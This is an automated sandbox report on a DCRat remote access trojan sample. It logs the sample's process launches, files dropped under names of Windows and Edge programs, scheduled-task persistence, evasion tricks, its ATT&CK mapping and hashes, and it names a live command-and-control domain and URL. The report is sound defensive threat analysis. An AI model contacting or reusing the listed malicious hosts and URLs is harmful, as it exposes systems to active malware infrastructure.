                              Source: C:\Recovery\StartMenuExperienceHost.exe TID: 4020Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; File opened: C:\Users\user\AppData\Local
                              Source: 0JLWNg4Sz1.exe, 00000000.00000002.1711950301.000000001C637000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4177598687.000000001AF90000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Process token adjusted: Debug
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Process token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Process token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Process token adjusted: Debug
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Memory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program ManagerH
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ,"Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," /
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: [{},"5.0.1",5,1,"","user","965543","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\Microsoft OneDrive\\setup","Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," / "]
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager`
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe; Queries volume information: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe VolumeInformation
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe; Queries volume information: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe; Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Recovery\StartMenuExperienceHost.exe; Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Stealing of Sensitive Information

                              Source: Yara match; File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
                              Source: Yara match; File source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara match; File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara match; File source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara match; File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match; File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
                              Source: Yara match; File source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara match; File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara match; File source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara match; File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 12 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                              Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 14 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              [Behavior graph. ID: 1545098, Sample: 0JLWNg4Sz1.exe, Startdate: 30/10/2024, Architecture: WINDOWS, Score: 100]

                              Source | Detection | Scanner | Label | Link
                              0JLWNg4Sz1.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              0JLWNg4Sz1.exe | 56% | Virustotal | | Browse
                              0JLWNg4Sz1.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              0JLWNg4Sz1.exe | 100% | Joe Sandbox ML | |
                              Source | Detection | Scanner | Label | Link
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat | 100% | Avira | BAT/Delbat.C |
                              C:\Recovery\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Joe Sandbox ML | |
                              C:\Recovery\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Recovery\DViaOgnvmAhwCXZ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Recovery\StartMenuExperienceHost.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\ALzNWdSZ.log | 24% | ReversingLabs | |
                              C:\Users\user\Desktop\KjTCumlu.log | 24% | ReversingLabs | |
                              No Antivirus matches
                              Source | Detection | Scanner | Label | Link
                              977255cm.nyashkoon.in | 0% | Virustotal | | Browse
                              Source | Detection | Scanner | Label | Link
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                              http://977255cm.nyashkoon.in/ | 0% | Virustotal | | Browse
                              http://977255cm.nyashkoon.in/secureWindows.php | 0% | Virustotal | | Browse
                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              977255cm.nyashkoon.in | 188.114.96.3 | true | true | | unknown
                              Name | Malicious | Antivirus Detection | Reputation
                              http://977255cm.nyashkoon.in/secureWindows.php | true | | unknown
                              Name | Source | Malicious | Antivirus Detection | Reputation
                              http://977255cm.nyashkX | DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                              http://977255cm.nyashkX:t | DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                              http://977255cm.nyashkoon.in/ | DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                              http://977255cm.nyashkoon.in | DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                              188.114.96.3 | 977255cm.nyashkoon.in | European Union | | 13335 | CLOUDFLARENETUS | true
                              Joe Sandbox version: 41.0.0 Charoite
                              Analysis ID: 1545098
                              Start date and time: 2024-10-30 05:21:07 +01:00
                              Joe Sandbox product: CloudBasic
                              Overall analysis duration: 0h 11m 7s
                              Hypervisor based Inspection enabled: false
                              Report type: full
                              Cookbook file name: default.jbs
                              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed: 36
                              Number of new started drivers analysed: 0
                              Number of existing processes analysed: 0
                              Number of existing drivers analysed: 0
                              Number of injected processes analysed: 0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode: default
                              Analysis stop reason: Timeout
                              Sample name: 0JLWNg4Sz1.exe (renamed because original name is a hash value)
                              Original Sample Name: 844679E76D8254BEDD67C98610F7D7AC.exe
                              Detection: MAL
                              Classification: mal100.troj.evad.winEXE@36/25@1/1
                              EGA Information:
                              • Successful, ratio: 20%
                              HCA Information: Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 0JLWNg4Sz1.exe, PID 7320 because it is empty
                                    • Execution Graph export aborted for target 0JLWNg4Sz1.exe, PID 7332 because it is empty
                                    • Execution Graph export aborted for target DViaOgnvmAhwCXZ.exe, PID 7784 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 2180 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 2492 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5428 because it is empty
                                    • Execution Graph export aborted for target smartscreen.exe, PID 7304 because it is empty
                                    • Execution Graph export aborted for target smartscreen.exe, PID 7344 because it is empty
                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    Time | Type | Description
                                    00:22:07 | API Interceptor | 12913190x Sleep call for process: DViaOgnvmAhwCXZ.exe modified
                                    04:22:00 | Task Scheduler | Run new task: DViaOgnvmAhwCXZ path: "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
                                    04:22:00 | Task Scheduler | Run new task: DViaOgnvmAhwCXZD path: "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
                                    04:22:02 | Task Scheduler | Run new task: 0JLWNg4Sz1 path: "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                    04:22:02 | Task Scheduler | Run new task: 0JLWNg4Sz10 path: "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                    04:22:02 | Task Scheduler | Run new task: smartscreen path: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                    04:22:02 | Task Scheduler | Run new task: smartscreens path: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                    04:22:02 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Recovery\StartMenuExperienceHost.exe"
                                    04:22:02 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Recovery\StartMenuExperienceHost.exe"
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    188.114.96.3 | zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
                                    188.114.96.3 | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/jI82Ms6K/download
                                    188.114.96.3 | 9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT | 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                    188.114.96.3 | DBUfLVzZhf.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
                                    188.114.96.3 | R5AREmpD4S.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
                                    188.114.96.3 | 7950COPY.exe | malicious | FormBook | www.globaltrend.xyz/b2h2/
                                    188.114.96.3 | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | paste.ee/d/Gitmx
                                    188.114.96.3 | 19387759999PO-RFQ-INVOICE-doc.exe | malicious | FormBook | www.zonguldakescortg.xyz/483l/
                                    188.114.96.3 | PO 4800040256.exe | malicious | FormBook | www.rtpngk.xyz/876i/
                                    188.114.96.3 | yGktPvplJn.exe | malicious | Pushdo | www.fnsds.org/
                                    No context
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    CLOUDFLARENETUS | XhYAqi0wi5.exe | malicious | Stealc | 172.67.179.207
                                    CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.97.3
                                    CLOUDFLARENETUS | Purchase_Order_pdf.exe | malicious | FormBook | 188.114.97.3
                                    CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
                                    CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
                                    CLOUDFLARENETUS | z1MRforsteamDRUM-A1_pdf.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
                                    CLOUDFLARENETUS | https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5 | malicious | Unknown | 172.67.132.160
                                    CLOUDFLARENETUS | Uviv7rEtnt.exe | malicious | Stealc, Vidar | 172.67.179.207
                                    CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
                                    CLOUDFLARENETUS | https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM= | malicious | HTMLPhisher | 104.17.25.14
                                    No context
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    C:\Users\user\Desktop\ALzNWdSZ.log | auXl1Tzyme.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | cGZV10VyWC.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | oLlotc8NO3.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | 9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | qZoQEFZUnv.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | b2smJKgMG6.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | 01YP9Lwum8.exe | malicious | DCRat |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | wYP4G1XOF1.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                    C:\Users\user\Desktop\ALzNWdSZ.log | w49A5FG3yg.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (845), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):845
                                                        Entropy (8bit):5.9115705056622225
                                                        Encrypted:false
                                                        SSDEEP:24:IvoMfyTOkSWeIgUzxXLxVX821GZsEKDrpm2H:IgMfyCkSBlUzJTX82mb6RH
                                                        MD5:0904C876FF238D3ED2575CEA1F55CADB
                                                        SHA1:D55178B6FEFF75AC3A3594C06B53FB41FD94DBC1
                                                        SHA-256:47D165999DC08ADC15B37EC84120F46ECAAECEC1332BDB7EA67A0CD0FF062E1B
                                                        SHA-512:C7EFB463CDEA9720D6293D172132AC241FEF99127ADFC482845D93FDC9579C0F025559AB14D3D8CD3241A47DCCDF36753E0617430E263A20ECC87CA436C883A9
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
